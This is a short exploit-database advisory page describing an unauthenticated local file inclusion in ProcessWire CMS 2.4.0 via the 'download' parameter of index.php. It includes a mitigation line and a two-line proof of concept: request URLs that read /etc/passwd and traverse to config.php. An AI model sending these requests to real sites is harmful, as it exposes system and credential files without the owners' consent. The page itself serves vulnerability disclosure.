header-logo
Suggest Exploit
vendor:
Processwire CMS
by:
Y1LD1R1M
7.5
CVSS
HIGH
Unauthenticated LFI
22
CWE
Product Name: Processwire CMS
Affected Version From: 2.4.2000
Affected Version To: 2.4.2000
Patch Exists: NO
Related CWE:
CPE: a:processwire:processwire:2.4.0
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2020

Local File Inclusion Processwire CMS 2.4.0

Local File Inclusion in Processwire CMS 2.4.0 allows to retrieve arbitrary files via the download parameter to index.php By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.

Mitigation:

Apply the latest patches or upgrade to a newer version of Processwire CMS.
Source

Exploit-DB raw data:

# Exploit Title: [Local File Inclusion Processwire CMS 2.4.0]
# Vulnerability Type: Unauthenticated LFI
# Date: [03.11.2020]
# Exploit Author: [Y1LD1R1M]
# Type: [WEBAPPS]
# Platform: [PHP]
# Vendor Homepage: [https://processwire.com/]
# Version: [2.4.0]
# Tested on: [Kali Linux]


** Description **

Local File Inclusion in Processwire CMS 2.4.0 allows to retrieve arbitrary files via the download parameter to index.php By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.

** Proof of Concept **

http://URL/index.php?download=/etc/passwd

http://URL/index.php?download=../config.php